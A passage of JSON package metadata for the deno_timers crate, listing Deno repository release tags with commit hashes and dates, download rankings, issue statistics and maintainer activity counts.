ub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T02:55:30.527Z","dependent_packages_count":3,"downloads":75740,"downloads_period":"total","dependent_repos_count":6,"rankings":{"downloads":8.911100534137182,"dependent_repos_count":9.242515875415783,"dependent_packages_count":9.170226439345255,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":5.476856539982798},"purl":"pkg:cargo/deno_timers","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_timers","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_timers","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_timers/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},